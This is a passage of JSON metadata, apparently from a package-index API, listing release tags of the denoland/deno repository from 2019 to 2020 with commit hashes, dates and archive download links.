deno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/r